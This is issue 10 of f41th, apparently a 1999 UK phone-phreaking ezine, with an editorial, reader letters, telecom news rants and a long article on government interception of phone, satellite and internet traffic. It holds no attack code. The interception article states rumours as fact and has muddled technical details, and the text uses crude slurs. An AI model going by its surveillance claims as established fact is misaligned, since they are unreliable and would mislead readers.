Copy Link
Add to Bookmark
Report

f41th Issue 10

eZine's profile picture
Published in 
f41th
 · 4 years ago

  


[ D4RKCYDE ]

yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|

[ F41TH ISSUE TEN: OCTOBER 1999 ]

.
.
:
|
+-----------[ hybrid * http://darkcyde.phunc.com
+-----------[ jasun * http://hybrid.dtmf.org
+-----------[ zomba * #darkcyde EFNET
+-----------[ digiphreq * mailto: hybrid@dtmf.org
+-----------[ downtime * mailto: hybrid@unixcode.com
+-----------[ force *
+-----------[ lowtek *
+-----------[ bodie *
+-----------[ microwire *
+-----------[ shadowx * FIND US ON THE PSTN, B1TCH
+-----------[ sintax *
+-----------[ shylock * (C)D4RKCYDE 1997,98,99+
+-----------[ elaich *
+-----------[ mata *
| *
+----------------------------------------------------------------+
|
:
.

So close it has no boundaries...
A blinking cursor pulses in the electric darkness like a heart coursing with
phosphorous light, burning beneath the derma of black-neon glass. A PHONE
begins to RING, we hear it as though we were making the call. The cursor
continues to throb, relentlessly patient, until...
.
:
|
-+[ editorial and introduction to f41th 10 +-> jasun/hybrid <---+
-+[ letters to f41th & D4RKCYDE +-> doods <---+
-+[ news update /bt adsl +-> hybrid <---+
-+[ government covert telecommunications interception +-> hybrid <---+
-+[ DDSN intellegent network +-> kelticphr0st <---+
-+[ guide to being arrested in the uk +-> bodie <---+
-+[ meridian security audit, and switch hacking +-> hybrid <---+
-+[ sco buffer overflow lameness +-> darkraver <---+
-+[ making chipz +-> hitman <---+
-+[ systemx internal network operations /structure +-> hybrid/GBH <---+
-+[ digital access carrier system DACS +-> hybrid <---+
-+[ outness +-> jasun/hybrid <---+
|
:
.
"when we come to your town, bow down"
-the w00

.
:
|
+-+[ editorial ]+---> by jasun <--------------------------+
+-+[ D4RKCYDE ]+---> jasun@phreaker.net <--------------------------+
|
:
.

Here we are with f41th issue 10, edited this time around by jasun. I
suggested to hybrid that I would take the job of editing and compiling this
issue of f41th, so he could have a break from it for a while. So, here we are
again with another issue packed full with info straight from the heart of
some twisted but intelligent people, who are constantly increasing their
knowledge base and kindly passing their knowledge onto you!

You may have noticed some new sections in this issue, such as News and
Letters. We decided that we would inlude these to let you all know some of
the feedback we receive, as always some positive and some negative, everyone
has their own opinions. The main thing is that by reading any issue of Faith
and indeed any ezine or article, you are hopefully learning something new
that you did not already know about or expanding your knowledge futher to
what you already did know. Afterall, spreading knowledge to others is what
it's all about... "Share what you know and learn what you don't" as they say.

Also, just a little note about some two upcoming events, Catastrophe '99 &
H2K. Catastrophe '99 will be held on the 4th December '99 in Manchester,
United Kingdom. It's mainly a party, but from information that is flowing
around, there will be speakers and much more as well. It should be a good
event, considering the success of the previous Manchester parties. I don't
have a url for this event yet, but it should be up soon. More details as they
are announced will be posted in the next issue of Faith.

H2K, Hope2000 will be Held in New York City, from July 14-16th next year. As
this event is a little further away than Manchester, we are going to be
booking travel and accomodation much earlier. A group of people are going
from the UK, if you are considering it, please contact us as we can probably
organsise a group discount deal if we all book together. H2K will be a 24
hour event for the full three days, as far as speakers and events are
concerned, check out the official conference website, http://www.h2k.net

Enjoy this issue,
jasun. :

" Good. Adaption. Improvisation.
But your weakness isn't your
technique. "
-Morpheus/Matrix

.
:
|
+-+[ letters to f41th ]+---> <-----------------------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-----------------------------+
|
:
.

Date: Wed, 4 Aug 1999 04:53:07 +0100
From: wheeler14@postmaster.co.uk
To: hybrid@dtmf.org
Subject: URL http://hybrid.dtmf.org/main.html

Hi, i am a relative newcomer to phreaking and i was wondering if you could
just answer a simple question for me.: whilst scanning 0800892xxx i kept
getting an american woman saying, "your call cannot be completed as dialed
please check and try again", prey tell if you will, what the ?$"£< does this
bloody mean. i take it that these numbers are something to do with direct
dialling, however i am probably totally wrong. If you could help me out with
this poxy woman as i will scream if i hear her again. if you can assist i can
be contacted through this mail address: wheeler14@postmaster.co.uk cheers,

MAV

[ yo mav.. "your call cannot be completed as dialed, please check
the number and try again, 2BM".. anoying huh? Try scanning O8OO
96X-XXX, then you'll really see how anoying the stupid telco
international DMS gateway recording really is. The answer is quite
simple, where the 2BM recording is, a terminating line once
existed. Infact, I'm sure that anyone that scans will find this
2BM recording EXTREAMLY anoying, infact, going through my scans I
have just worked out that I've had to listen to that 2BM whore
2,429 times.. my advise to you: after listening to that damn
recording over and over and over and over and over again, you'll
notice a faint humming noise on the line just before the b1tch
begins to speak.. just do what I do, hang up before you have to
listen to it. If you are truely twisted and insane (like me) you
can goto www.telecom-digest.org and follow the link to a website
called "the website you have reached" where you can listen to
1OO's of telco fault/test recordings in .wav format. For those of
you who want to hear this damn recording (from the UK) dial one of
the following numbers, try to resist the urge to smash up your
telephone... O8OO 961 OO6, O8OO 961 O21. ]



Date: Sun, 25 Jul 1999 04:03:08 +0100
From: xrayman <xrayman@freeuk.com>
To: hybrid@dtmf.org
Subject: subscribe


subscribe xrayman@freeuk.com


[ heh ]


Date: Thu, 29 Jul 1999 21:15:16 +0100
From: tommy <tmcoy@globalnet.co.uk>
To: hybrid@dtmf.org
Cc: tmcoy@globalnet.co.uk
Subject: phreaking


Regarding the uk phreaking scene,
I hope you could please e-mail up-to-date information on obtaining free
calls from bt phoneboxes and cocots and boxing including blue, black etc (
including wether any of the above are possible now in 99). As I have read
alot of files on the web most if not all are outdated therefore I was
hoping for you to provide some useful e-mail or irc sources because any new
info is not released to the web to prevent BT who can monitor the web from
holing up any loopholes. Finally, would you kindly obtain some bulletin board
numbers with info on the above and comment on their usefulness.

tommy

[ heh. tip: nothing is outdated or obsolete, people just forget how
to do shit. Phreaking is not about making free calls. I'm not
going to mail you codez. BBSs: I used to run one, I got pissed off
with ppl dialing up in the hope that when they discconect they will
have the abilty to place free calls. BBSs are rare these days, and
in most cases are aimed at people that take a more serious
approach to the 'scene' (no k0d3 kiddies) - try altavista.com
keywords "help i'm lame" or goto the library and get "toll-fraud
for dummies" ]




Date: Fri, 23 Jul 1999 18:04:45 +0100
From: Neon Bunny <the_neon_bunny@hotmail.com>
To: hybrid@dtmf.org
Subject: Faith


I'm currently compiling a collection of files about different types of
systems (e.g. Shiva-LAN-Rover, VAX etc.) and how to identify them. I'd be
grateful if you'd give me permission to distribute your article from Faith 3
on Shiva-LAN-Rover systems. I'll just snip the article but leave the header
including the author's name & email.
While on the subject of permission, I take it that it's ok to distribute the
full collection of faith (1-7) at my site below, if not then let me know and
I'll shift 'em.
I also have a handscan of 0800 891XXX which I can send if you want it for
the next faith.

NeonBunny

---
Have you seen the new BunnyBox???
www.bunnybox.f9.co.uk


[ werd. n/p dude.. just one thing: if you decide to distro f41th on
ya box, be sure to have the latest issue linked to the following
address.. ]

<a href="f41thx</a">http://hybrid.dtmf.org/files/faith/faith[x].zip">f41thx</a>


This message contains non-ASCII text, which can only be displayed
properly if you are running X11. What follows
may be partially unreadable, but the English (ASCII) parts
should still be readable.
please help me iam being bothered by this lad but i cant get his ip address
to bother him back could you tell me how?
shaggy@corl.fsnet.co.uk

[ ? ]

i have been reading faith zine for some time, and i was wondering if
subscription is possible where some auto-bot would notify us, devoted
users, of every new issue.
thatnk you for your time.

--
Be well,
Net Runner

[ just download it ]

just a quick one,,,,,don't take away the ascii logs,, the humour in them and
the similar funny parts of f41th are the things that set you apart from the
"other mags". Like for example the fun you had in #jesus. that reminded me of
when i went in there,, took the piss out of the ops for not being christian
enough...(i was arguing that jesus wouldn't ban ppl from the chat room)......
the logs and other stuff make the readers think that the zine's being written
by people we understand and emphasize with. it's nothing massive but it's one
step away from the mag we can read and laugh at the same time. cheers anyway,
mail us back if you want to discuss anyfing,,, or catch me on efnet
- Degener8

[ yeah/ish ]

Hi,
Just a quick note to say what a great site you have got and to ask a
quick question. If I wanted to obtain Tools and Equipment for research
purposes to do with hacking/phreaking where could I get hold of them?

Cheers

THE FAT MAN

[ the donut store ]


This message contains non-ASCII text, which can only be displayed
properly if you are running X11. What follows
may be partially unreadable, but the English (ASCII) parts
should still be readable.
APT Issue 5 is now out.
Download it from:
http://surf.to/krash

For subscription information, email me with the subject CMD:HELP

[ NO#@~%$!! - your magazine and its SWAT team crew can suck
my left nut. All the stuff on your site sucks, i dont wanna
know how to blow shit up, I THINK I KNOW HOW TO FUCKING RED
B4WX.... GO AWAY, AND SEEK HELP ]


" Your spoon does not bend because
it is just that, a spoon. Mine
bends because there is no spoon,
just my mind. "
-SpoonBoy/Matrix

.
:
|
+-+[ f41th Newz ]+---> by hybrid <-----------------------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-----------------------------+
|
:
.
/*
* UK moblie telecom companys asked to
* cut down on cellular masks
*/



UK cellphone companys such as Orange, one2one, cellnet etc have been told
not to install to many radio masks. The fact is, we need more to improve
reception, but alot of people seem to think they ruin the scenery of England.
WTF?.. This is no shit, now cellular giants such as cellnet are developing
anttenas that are in the shape of trees and brown in colour so they "blend
in" LOL. In one area of the UK, an anttena was errected near to an old
persons home, soon after, residence of the old peoples home complained that
the CellNet radio mask was interfering with thier hearing-aid equipment!
And of course the mask was taken down and moved, so a whole bunch of people
lost cellular coverage simply because some old hag's hearing aid.. shiet@œ$!
what is this country! -- i want out!, wheres my ticket to NY?



/*
* BTs new generation of switches
* for the UK communications backbone.
*/


BT have announced a framework agreement with Ericsson for the development and
supply of the next generation, high performance switches designed to meet the
needs of the rapid data traffic growth in the UK. The deal is worth
potentially up to œ270 million and will secure BTs network capacity into the
next millennium.

The new switches from Ericsson will enable BT to expand its backbone network
capacity rapidly to meet the anticipated growth in Internet, high speed data
and video services. The Ericsson switches will integrate seamlessly into BTs
existing network.

The switches will be deployed over the next four years using state of the art
technology, providing initial switching capacities of up to 160 Gigabits per
second and future growth into Terabits. The first switch was scheduled to go
live in June, 1999. All switches will be directly connected to BTs optical
fibre SDH network, which currently has more than 600 nodes and is doubling in
size every year.

Installation work to replace existing trunk switches with the new high
performance switches started during 1999 and will continue over the next four
years.

This investment is over and above the œ800 million expenditure BT announced
last May, which is being used to extend significantly the reach of BTs core
Synchronous Digital Hierarchy (SDH) optical fibre transmission network and
exploit Dense Wave Division Multiplexing (DWDM) technology.



/*
* Oftel look into ADSL
* (about fucking time)
*/


There are many things that I dislike about BT and UK regulators such as
Oftel, one of them being they all brag about "High-Tech" technologys on the
UK PSTN such as ISDN, or how gratefull we should be that we _only_ have to
pay 1p a minute for local calls (net access). Like, get with the program,
heh. BT need to sort it out.. ISDN blows, but they seem to think its the
forefront of technology.. Oh yeah, not to mention the fact that if you have
a standard line, and ask BT for a second line for net access, guess what? -
they wont install a second line for you, they will stick a device such as the
DACS (Digital Access Carrier System) on your line which will split it into 2
seperate carriers.. W0W, thanks BT, now I can join the "BT SuperHighway" at
lightning speeds of a maximum of 28800bps, and courtisy of BT "SuperHighway"
I get bonus CRC checksum errors!

IF YOU ARE ONE OF THE MILLIONS OF UK BT SUBSCRIBERS THAT ASKED
BT TO INSTALL A SECOND LINE FOR YOU, CHANCES ARE YOU HAVE A
DACS II, OR WB900 UNIT MULTIPLEXING YOUR LINE.. TRY DOING A SALT
TEST FROM THE LINE.. 17070.. IT WONT WORK CUSE THAT LINE IS NON
EXISTANT. PHONE BT _NOW_ TELL THEM YOU DONT WANT THEIR PIECE OF
SHIT "HIGH TECH" DACS UNIT ON YOUR LINE.. GET WHAT YOU PAID FOR
(A REAL LINE). DACS/WB900= 28.8, TELL THEM WHERE TO GO.

note: I know someone that had a BT DACS line spliter fitted who asked BT for
a SECOND line.. we phoned BT and asked why this was..

" dood, why can I only get 28.8 on my line? "

" you need to update your modem "

" i have a 56k modem, it doesnt like your DACS superhighway "
blah blah blah..

then they said... (get aload of this shit)

" The reason the DACS II system is deployed is because we have
concerns about the environment, if everyone had 2 lines it would
be wires everywhere.... "

AND..??


BT seem to think that including E.T. in their lame-ass adverts will impress
customers with their services.. The money they spent on the copyright rights
to show E.T. was probably enough to update an exchange, but thats BT for you,
they'll be selling baked-bean cans with string attached to them soon..

THEY DONT CARE ABOUT UK TELECOMS.. THEY JUST WANT YOUR 1P p/m

Anyways, I'm getting worked up here, so I'm going to continue with the newz..
The UK telecoms regulator Oftel, has proposed that ADSL should be present in
rural and "disadvantaged" areas of the UK, therefore BT have (proposed) that
400 exchanges will be updated to carry the "new" technology by March 2000..
Areas that will benifit from ADSL (Asymmetric Digital Subscriber Line) are
as follows:

London *
Cardiff *
Belfast *
Coventry *
Manchester *
Newcastle *
Leeds *
Edinburgh *
Glasgow *

Heh, BT need to sort it out.. considering ppl in NewYork are able to get 7
Mbit/sec ADSL connections (equivalent to 1,500 BT "superhighway" connections)
sn1per$/sbin/ping :( For more information regarding Oftel and BT goto:
www.oftel.gov.uk or www.bt.com



/*
* PLE (phone loosers of england)
* appologise to D4RKCYDE...
*/


[ taken from http://www.phoneloosers.com ]
[ phoneloosers of england ]

03/09/1999 PLE Appologises to D4rkcyde

"We want to apologise to d4rkcyde for including some of their scanned numbers
in the PLE Phone directory without getting their permission. OKaos sent you
an E-mail but when you never replied he stupidly took this as a yes, and this
was obviously wrong. OKaos has now been relieved of his duties of Editor - we
felt this was the best thing to do. If we could find any of your important
members on IRC or anywhere else for that matter we would apologise in person,
but as we can't even find your site anymore this will have to do. Sorry Guys,
hope you can understand / forgive..."


irc: #darkcyde efnet
url: http://darkcyde.phunc.com


" Fuckin' idiots don't know shit. "

-Neo/Matrix
.
:
|
+-+[ Government telecommunications interception ]+---> by hybrid <-----------+
+-+[ D4RKCYDE ]+---------------------------> hybrid@dtmf.org <-----+
|
:
.
BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]
Covert Government/Military Interception of
International Telcommunications. (Pure Paranoia)
Written for f41th magazine, October 1999
by hybrid <hybrid@dtmf.org hybrid@ninex.com>



Part I
1. Introduction
2. Communications Intelligence (COMINT) and the NSA
a) UKUSA Alliance
3. The Covert Interception of International Telecommunications
a) International Leased Carrier (ILC) Interception
b) High Frequency Radio Interception
c) Interception of Microwave Radio Relays
d) Interception of Submerged Telecommunications Cables
e) Covert Communications Satellites
f) Communications Techniques
o Operation SHAMROCK
o More High Frequency Radio Interception
o The Space interception of InterCity Networks
o SIGNIT Satellites

Part II
5. Introduction to part II
a) Submarine Cable Interception
b) Covert Interception of the Internet Protocol
6. Covert Collection of High Capacity Signals
a) New Satellite Networks/Systems
b) ILC Processing Techniques
7. Hardcore Telecommunications Covert Interception
a) Broadband (High Capacity Multi-Channel) Communications
b) Covert Telecommunications Interception Equipment
o Extraction of Wideband Signals and Data Analysis
o Covert Data Processing, Fax Transmission Analysis
o Multi Protocol Traffic Analysis Techniqes
c) Speech Recognition and Voice Interception
o Advanced Speech Recognition, Real CallerID
8. Closing, Summerisation
a) My PGP Key ;>



Part I
------

1. Introduction
===============

Are you paranoid? You damn well should be. I've recently come accross some
very disturbing facts about how international covert governemt organisations
intercept, filter and colate data from international communication protocols
and networks. This article is only the very tip of the iceberg, their is no
way I could possibly cover the wide spectrum of "big brother" activity that
shadows over the communication networks that are deployed at present, to do
so would require a whole database. The fact is big brother IS watching you,
not just you, but also other governments and echonomical bodies. In this
file I will discuss the different, very covert techniques that are deployed
by certain agencys and alliances to efectivly intercept any type of public,
or supposid "classified" data/voice transmission. After reading this article,
you'll probably think twice before placing a phone call.


2. Communications Intelligence (COMINT) and the NSA
===================================================


COMINT is an abbreviation for Communications Intellegence. The covert
interception of telecommunications has existed for a very long time, and
began around about the same time that public telecommunications became
widely available. It is evident that every single "technologicly advanced"
country in the world participates in the covert interception of foreign
communication mediums. I would define it as an ongoing game of counter-
intellegence, where superpower nations are spying on each other, spying on
each other. The scary thing is, it's not just diplomatic communications that
are being intercepted, in most cases, an entire nations telecommunications
infastructer is being monitored, both from remote locations, and from our
own intellegence organistaions spying on us. The NSA openly admit to such
activity, although would probably deny any "local" communication interception
techniques. COMINT is in the same intelllegence fammily as SIGNIT (Signals
Intellegence) which involves the interception of signal emmisions from
sources such as radar emmisions.

Obvious COMINT communications targets: (interception)

o military communications
o diplomatic communications
o economic intellegence
o scientific intellegence
o drug trafficking
o organisied crime
o severe fraud
o terrorism

Side note: hacking, phreaking, participation in "underground" hacking
collectives would be defined as organised crime, and in some cases defined
as terrorism. (they have a real nice way of classifying things)

a) UKUSA Alliance

USSS (United States Signit System) is made up of the NSA (National Security
Agency), collective sub-units known as the "CSS" (Central Security Service),
aswell as some parts of the CIA and surrrounding organisations/bodies. After
the second world war in 1947, the US made and aggrement with the UK to
commense international intellegence operations world wide. Other English
speaking countrys where allied into the UKUSA aggrement as second partys,
they include Canada, NewZealand and Austailia. The UKUSA intellegence
alliance was not exposed until earlier this year (March 1999), when the
Austrailian government confirmed its deployment of DSD (Defense Signals
Directorate) and admited to being part of the UKUSA colaboration of
intellegence gathering.


3. The Covert Interception of International Telecommunications
==============================================================


a) International Leased Carrier (ILC) Interception

A knowledgable phreak will know how easy it is to intercept supposid private
telecommunications, we all know that the US PSTN (Public Switched Telephone
Network) is made up of RBOCs (Regional Bell Operating Companys) which all
deploy multiple levels of switching architecture and signal protocols. For
over 80 years, incomming and outgoing international telecommunications
traffic passing through International eXchange Bounderys have been
intercepted and filtered for an initative known as "National Security". All
US RBOCS have strong links with COMINT, and IXCs (Inter eXchange Carriers)
such as AT&T have ties with goverment communication collectives. COMINT
organistaions refere to such carrier providers as ILCs (International
Leased Carriers), and would obviously have to work closly with such providers
where telecommunications interception is involved.

b) High Frequency Radio Interception

The majourity of the worlds international contempory telecommunications
networks are made up of optical transmission protocols, but before this,
most international telecommunications where conducted via HF transmission
(Higher Freqency) and was used both for public communication aswell as
diplomatic and military communications.


------------x-----------------------x-----------------------x
/ \ / \ /
/ \ / \ /
/ \ / \ /
/ \ / \ /
/ \ / \ /
x-----------------------x-----------------------x-------------
x) y) z)


In the above diagram, (x) is transmitting to (z). The HF signal is bouncing
from the Earths ionosphere back down to (y), then back to the ionosphere,
down to (z). Incididently, in this scenario, (y) is the dude in the middle,
incercepting the transmission before it reaches (z).

Here, the interception of transmission was reletivly straight forward because
HF radio transmissions are bounced from the Earths ionosphere and back down
to the Earths surface, forming a zigzag type path around the world. This
provided ample space for a primitive "man in the middle" interception of the
reception of such data.

c) Interception of Microwave Radio Relays

Microwave radio was deployed in the 1950s as a means to provide higher-
cappacity inter-city communications, implementing telephony and televison.
Microwave parabolic dishes are placed around 50km apart from each other, as
a means of communicaion relay stations. Later I will discuss how such a
communications medium can be intercepted.

d) Interception of Submerged Telecommunications Cables

Early international telecommunications where very primitive compared to what
we have today, and only allowed a maximum capacity of 100 telephone calls
on similtanious channels. Today Optical Fibre transmission systems are
deployed as part of the world wide PSTN, and can handle 5Gbps of similtanious
data transmission, which is 60,000 phone calls occuring similtaniously, which
is why we no longer require operators to place international calls.

e) Covert Communications Satellites

Because of the nature of microwave emmisions, they do not reflect off of
the Earths ionosphere like HF radio transmissions. Instead, they penetrate
the Earths atmosphere and are emited off into space. This is where the covert
satelites come into the picture.


x salelite
/ \
/ \
/ \
/ \
/ \
------------x-----------------------x------------ ionosphere
/ \
/ \
/ \
/ \
/ \
x-----------------------------------------------x- earths surface
x) z)


The most popular satelite setup are those that operate in geo-stationary
orbit, or (the clark belt) and are provided for broadcasting purposes. The
largest collection of communications satelites in orbit are the COMSATs and
are operated by the International Telecommunications Satelite organisation
(Intelsat). The latest addition of telecommunications satelites can handle
over 90 thousand similtanious calls each.

f) Communications Techniques

Before 1970, the majourity of communications systems where of anolouge nature
and utilised continuous wave technique. Now, in all majour communication
systems are digitaly derived, and provide a much higher capacity. The highest
capacity systems are for use of internet backbone usage (STM-1/OC-3) and can
operate at data rates of 155Mbs (Million bits per second) which is the
equivalent to the transmission of 1 thousand books a minute. I'll cover these
transmission techniques in more detail in the technical part of this file.
Where this type of digital communication is deployed COMINT organisations
cannot intercept data unless they have diect access to the communications
channels that the data travels over. The data is usually encrypted, but no
big deal for such an collective as COMINT, so they obtain access to these
communications channels with (or without) the prior co-operation of the
carrier provider.

o Operation SHAMROCK

The NSA are well known for systematically gathering telecommunications
traffic from offices of majour cable companys. The interception of cable
traffic in the US is refered to as "operation shamrock", and until recently
remained un-exposed for over 30 years. In 1975 an NSA director admitted to
the US house of representatives that such operations do exist within the NSA.

"..The NSA systematically intercepts international communications, both voice
and cable" "messages to and from American citizens have been picked up in the
course of gathering foreign intelligence". "...was obtained incidentally in
the course of NSA's interception of aural and non-aural (e.g., telex)
international communications and the receipt of GCHQ-acquired telex and ILC
(International Leased Carrier) cable traffic (SHAMROCK)..."

o More High Frequency Radio Interception

HF radio transmissions are easy to intercept, in the sense that all you
need is the appropraite equipment, and an area which is located in a quiet
radio location. Up until 1980 the NSA and the UK's GCHQ used HF radio
interception equipment to capture European HF communication on a base in
Scotland. The equipment used then was a 400 meter in dialmeter antenna, and
was designed to be omnidirectional (capture emitions from every possible
angle). Their is a secret base in the UK at Chicksands which is operated by
the NSA and DODJOCC, It's purpose is to collect and intercept Soviet and
Warsaw Pact air force communications, and also to collect ILC and "NDC"
(Non-US Diplomatic Communications).

o The Space interception of InterCity Networks

Long distance microwave involves the implementation of many transmitters
and relay stations. When a microwave transmission takes place, the recieving
end only absorbs a small fraction of the orional signal strength, the parts
of the microwave transmission that the reciever didn't pick up pass through
the Earths atmosphere into space as discussed before. Therefore, contempory
microwave communications are intercepted by covert intellegence gathering
satelites that are mounted 80 degrees longditude of the horizon. At present,
their are many secret satelites operating both in geo-syncronous orbit aswell
as satelites following mission paths that gather as much microwave
communication traffic as possible and relay back to secret installations on
Earth.

o SIGNIT Satellites

The CIA first launched the SIGINT satelite program back in 1967 which lasted
until 1985. The satelites where operated from remote ground installations in
Austrailia and implemented parabolic antenna which where able to unfold once
in orbit, initially the satelites intercepted transmisisons from the VHF
radio band. To this date, similar satelites are in use, codenamed MAGNUM and
ORION, they are designed to intercept and filter multiple communications
methods on Earth such as VHF radio, cellular and mobile phones, pagers,
and also mobile data links, packet radio etc. The idea of this is fairly
daunting, basically if you page your girlfriend, chances are the pager radio
signal will be intercepted but probably filtered as it would be of no
relevance to "national security". This is not some paranoia/conspiracy
theory, this is fact. The IOSA system (Intergrated Overhead Signet
Architecrure) is very much at large to this date, and is controled from
ground level at the following locations accross the world:

o Buckley Field, Denver, Colorado
o Pine Gap, Australia
o Menwith Hill, England
o Bad Aibling, Germany

Each "secret" installation is rumoured to cost alot of money to run, somthing
in the line of 1 billion dollars each. In 1998, the US National
Reconnaissance Office (NRO) said it would combine the three separate classes
of Sigint satellites into an Integrated Overhead Sigint Architecture (IOSA)
in order to " improve Sigint performance and avoid costs by consolidating
systems, utilising ... new satellite and data processing technologies".
Because of this new spy satelite setup in earth orbit, the US can now use
its newly aquired technology to intercept ANY mobile communications source,
including city to city traffic accross the globe. The main intension of these
satelites is however to concentrate on foreign military and diplomatic
"hotspots". GCHQ in the UK are now part of project MERCURY and use the system
for similar purposes.


Part II
-------

Introduction to part II
=======================

Summerising part I, we now know about covert satelites, the basess, and the
general layout of microwave interception. Now I'm going to discuss the
slighlty more scary stuff, the parts that affect me and you, ranging from
the interception of phone traffic, to the mass intellegence gathering on the
internet. Hopefully you've read all of part I so you can understand the
folowing better, if you just paged<down> you suck.


Submarine cable interception

Submarine cables are widley used in international telecommunications, and
are therfore a target for anyone wishing to intercept international
telecommunications traffic. Juring the 1970s, a secret submerged cable
taping operation nammed "IVY BELLS" was executed by US submarines near the
USSR. The mass line tap operation of USSR communication ended in 1992 when
the geographic locations of the submerged line taps where sold to KGB by a
former NSA employlee. To this date, the US still plant submerged line taps on
various communications links, rumoured to be the Middle East, the med,
eastern asia, and south america. The United States is the only naval power
known to have deployed deep-sea technology for this purpose.

Where fibre Optic cables are concerned, it is impossible to simply place a
radio sensitve inductive tap on them, because obviously fibre Optics don't
leak radio freqency signals. However, the NSA spend alot of time and money
into the research of Optical fibre tapping, and are rumoured to be
successful in such research using optoelectronic "repeaters" which boost
signal levels over long distances.


Covert Interception of the Internet Protocol
============================================


The NSA and GCHQ all operate a private network which is concidered to be just
as large as the public net. This private network is known as project
EMBROIDERY and is said to span the globe via a massive WAN network. It is
this network which is said to serve such purposes as project ECHELON and
other intellegence projects. The whole system is based on the IP protocol.

The majority of internet traffic origionates or is passed through the US,
and major routers. Sinse early 1990, the COMINT project have developed
systems which intercept and filter all packet, or digital data traveling via
the US net backbones. The targets of such interceptions are communications
between Europe, Asia, Oceania, Africa and South America.

When a packet is sent, depending on the time stamping of the origin and
destination, it is likely it will pass through a major network exchange
somewhere in the US. For example, routers in USwest are most idle when
European packet traffic is at its peak beacuse of the time zone differences.
Because of this, hig capicity network traffic will pass through the
routers which are situated in USwest, which subseqentialy the NSA have
access to (for COMINT purposess), it is then that the NSA can intercept data
traveling to and from European countrys.

Where COMINT and the internet are concerned, COMINT interception takes
advantage of the way in which internet packets are routed, in the sense that
datagrams contain the numerical routing instructions which are used by
COMINT to filter irrelevant traffic. Any packet with a military or
diplomatic datagram origin, is likely to be intercepted at a major US
network backbone to be filtered or analyised.

alt.Usenet discussion groups are well known to be intercepted and analyised
by government agencys, such usnet traffic accumulates about 15 gigs of
transmitted data per day. Intellegence agencies have open access to all
usenet discussion groups, and most store the information in massive data-
bases. For example, in the UK, the DERA (Defense Evaluation and Research
Agency) maintain a 1 terrabyte databasse which contains 90 days worth of all
usnet messages. DERA also operate web-robots which scan the net for certain
keywords and then mirror entire sites on this database. Subseqentialy my
own site has been visited by DERA, and sinse then is visited 2 per month by,
xxx.dera.gov.uk - - [18/Jul/1999:16:10:05 -0500] "GET /files/hybrid-files/x

Recently an NSA employee informed the public that certain major backbone
net exchanges are being monitored for ALL data traveling through them in the
US. The NSA either have direct access to them, or have mass sniffer programs
running to collect as much data as possible traveling through the follwowing
major internet exchanges in the US: (NSA Internet Comint access at IXP sites)

Internet site Location Operator Designation
------------------------------------------------------------------------------
FIX East College Park, Maryland US government Federal Information
Exchange
------------------------------------------------------------------------------
FIX West Mountain View, California US government Federal Information
Exchange
------------------------------------------------------------------------------
MAE East Washington, DC MCI Metropolitan Area
Ethernet
------------------------------------------------------------------------------
New York NAP Pennsauken, New Jersey Sprintlink Network Access Point
------------------------------------------------------------------------------
SWAB Washington, DC PSInet/BellAtl SMDS Washington
Area Bypass
------------------------------------------------------------------------------
Chicago NAP Chicago, Illinois Ameritech Network Access Point
------------------------------------------------------------------------------
SanFran NAP SanFrancisco, California Pacific Bell Network Access Point
------------------------------------------------------------------------------
MAE West San Jose, California MCI Metropolitan Area
Ethernet
------------------------------------------------------------------------------
CIX Santa Clara California CIX Commercial Internet
Exchange
------------------------------------------------------------------------------

It is rumoured, and almost certanly true, that a leading US
telecommunications and internet provider company are contracted with the NSA
to develop specialised mass data gathering software for installation on
such internet exchanges, other software manufactures such as microsoft and
netscape etc are said to aid in the production of specialised network
traffic interception equipment. (see enclosed .jpg files for screenshots)


6. Covert Collection of High Capacity Signals
=============================================


Where very sensitive data is concerned, diplomatic agencies are usually very
wise to the fact that someone out their may be interested in intercepting it.
Therefore, when the more obvious interception methods/procedures are
inpracticle, COMINT agencies develope special devices that can be installed
on the target premisiss or base. The NSA manufactures specialised equipment
for use in covert activitys, one such device is called the "ORATORY" -a
computer that fits into a brief case, which is programed to behave on
dictionary selection for use in sigint data interception.

a) New Satellite Networks/Systems

A popular means of communication for government employees are private
dedicated mobile communications. Their are satelites orbiting very fast
around the earth, each in its own orbit pattern which provide global coverage
for diplomatic usage. These systems are sometimes called Satelite Personal
Communications Systems or SPCS. At present, their is a satelite network
called the IRIDIUM network, which was launched in 1998. The IRIDIUM satelite
network implements 66 satelites each relaying mobile data back to the ground.
IRIDIUM is considered to be fairly secure, in the sense that anyone trying
to intercept network data would have great trouble as the satelites are fast
moving and only beam information back down to earth in a concentrated beam.

b) ILC Processing Techniques

Covert agencies employ a vast array of multi-protocol data interception
systems and devices. Such devices are capable of intercepting selectable,
or randomly chosen communications channels implementing a new concept called
"topic analysis". It has been a rumour for a long time that covert agencies
use equipment that is capable of reacting to certain keywords when
intercepting voice or modem traffic. It is rumoured that if you say somthing
like "kill_the_presedent" over the telephone, you'll have a gathering of
feds outside your front door. This rumour however, is probably not true when
refering to a residential line, unless a line has been "tapped" beforehand.
However, such systems DO exist, and all operate on topic analysis techniques.
For example: Such systems are based on dictionary computers with built in
(pre-programmed) key words. These systems are designed to be placed in the
paths of communications channels, such as standard voice traffic, or modem
links. The properties of such systems are as follows:

o A topic analysis COMINT system would be "attracted" to certain
levels of communications traffic, such as international calls to
and from "hotspot" areas, above normal calling freqency (scanning,
or suspicious overusage of a given communications protocol).

o ability to "pick-up" on certain keywords, or signitures.

o voicetracking capabilitys, ie: voice recognition, freqency
analysis of voice patterns.

It is therefore presumarable that such monitornig devices may be attracted to
any given voice/data channel if such patterns are emited, ie: heavy call
usage. However, such interception techniques can be impaired to a certain
extent, when the channels being monitored implement voice or data encryption,
hense the international export laws on cryptographic engines and alghorithms.
Comint interception devices are individualy designed to intercept differnt
arrays of communications protocols, for example, some devices are designed
soly to intercept internet traffic (packet analysis, headers etc) others are
designed to intercept pager signals, and voice traffic (topic analysis). Any
type of publically known communications medium is subject to interception by
a foreign source (if their is motive).


